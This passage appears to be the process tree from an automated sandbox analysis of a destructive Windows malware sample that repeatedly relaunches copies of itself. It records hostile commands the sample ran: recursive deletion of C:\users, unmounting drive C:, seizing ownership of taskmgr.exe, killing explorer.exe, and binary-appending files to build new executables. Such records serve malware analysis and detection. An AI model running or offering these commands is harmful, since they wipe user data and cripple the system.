        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe /killwindows 1698530834
        10⤵
        
        PID:11700
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe /killwindows 1698530834
        11⤵
        
        PID:1548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:13572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe /KillHardDisk 1698530834
        10⤵
        
        PID:12700
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe /KillHardDisk 1698530834
        11⤵
        
        PID:13252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:13740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /save 1698530834
        6⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:5888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:6624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /autoup 1698530834
        6⤵
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /autoup 1698530834
        7⤵
        
        PID:7396
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /killwindows 1698530834
        6⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /killwindows 1698530834
        7⤵
        
        PID:1220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:7412
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:10272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /KillHardDisk 1698530834
        6⤵
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /KillHardDisk 1698530834
        7⤵
        
        PID:6160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:9248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:9296
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:13292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /killMBR 1698530834
        6⤵
        
        PID:9584
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /killMBR 1698530834
        7⤵
        
        PID:6792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /protect 1698530834
        6⤵
        
        PID:11728
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /protect 1698530834
        7⤵
        
        PID:5124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7049.exe
        8⤵
        
        PID:11324
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /autoup 1698530834
        6⤵
        
        PID:12524
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /autoup 1698530834
        7⤵
        
        PID:13108
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:6024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+513975.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
      4⤵
      PID:8
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  PID:3016
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
    3⤵
    PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  PID:488
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    PID:1496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+026554.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe
      4⤵
      PID:4256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe 1698530834
      4⤵
      PID:1992
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:1720
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe /protect 1698530834
        6⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:5732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe+025508.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7000.exe
        8⤵
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7000.exe 1698530834
        8⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7000.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7000.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:4328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7488
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:7992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe+712621.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7007.exe
        8⤵
        
        PID:7260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7007.exe 1698530834
        8⤵
        
        PID:7676
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7007.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7007.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:7796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8672
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe /save 1698530834
        6⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d700.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:5768
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:4304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:1340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe 1698530834
      4⤵
      PID:5676
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:6440
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:7148
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:1876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /autoup 1698530834
        6⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /autoup 1698530834
        7⤵
        
        PID:3656
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /killwindows 1698530834
        6⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /killwindows 1698530834
        7⤵
        
        PID:2680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:9084
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:4424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /KillHardDisk 1698530834
        6⤵
        
        PID:8372
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /KillHardDisk 1698530834
        7⤵
        
        PID:5488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:5736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:11220
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:12104
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /killMBR 1698530834
        6⤵
        
        PID:9472
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /killMBR 1698530834
        7⤵
        
        PID:9280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /protect 1698530834
        6⤵
        
        PID:11524
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /protect 1698530834
        7⤵
        
        PID:9572
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /autoup 1698530834
        6⤵
        
        PID:12728
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe /autoup 1698530834
        7⤵
        
        PID:13220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+621829.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d706.exe
      4⤵
      PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  PID:1940
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
    3⤵
    PID:532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  PID:564
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    PID:1600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+715282.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
      4⤵
      PID:4408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe 1698530834
      4⤵
      PID:5864
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:2348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+2875.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        8⤵
        
        PID:3164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe 1698530834
        8⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:7252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7724
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /autoup 1698530834
        10⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /autoup 1698530834
        11⤵
        
        PID:9064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /killwindows 1698530834
        10⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /killwindows 1698530834
        11⤵
        
        PID:5060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:5236
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:12064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        12⤵
        
        PID:12496
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        13⤵
        
        PID:14116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /KillHardDisk 1698530834
        10⤵
        
        PID:9576
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /KillHardDisk 1698530834
        11⤵
        
        PID:8652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:11536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /killMBR 1698530834
        10⤵
        
        PID:11320
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /killMBR 1698530834
        11⤵
        
        PID:2600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /protect 1698530834
        10⤵
        
        PID:12600
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /protect 1698530834
        11⤵
        
        PID:13148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe /autoup 1698530834
        10⤵
        
        PID:7608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+09913.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe
        8⤵
        
        PID:6320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe 1698530834
        8⤵
        
        PID:9024
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7070.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:9088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:4520
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:4100
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:6736
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:7108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:7200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+529682.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
      4⤵
      PID:4832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe 1698530834
      4⤵
      PID:6840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  PID:764
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
    3⤵
    PID:5152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  PID:5300
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    PID:6060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+33488.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d703.exe
      4⤵
      PID:4492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d703.exe 1698530834
      4⤵
      PID:1848
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d703.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d703.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:7592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:7852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:8624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+216548.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d702.exe
      4⤵
      PID:7712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d702.exe 1698530834
      4⤵
      PID:6332
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d702.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d702.exe 1698530834
        5⤵
        
        PID:3748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6464
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  PID:5196
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
    3⤵
    PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:5980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:6472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /autoup 1698530834
  2⤵
  PID:5028
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /autoup 1698530834
    3⤵
    PID:8188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /killwindows 1698530834
  2⤵
  PID:6824
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /killwindows 1698530834
    3⤵
    PID:5912
  - - C:\Windows\system32\cmd.exe
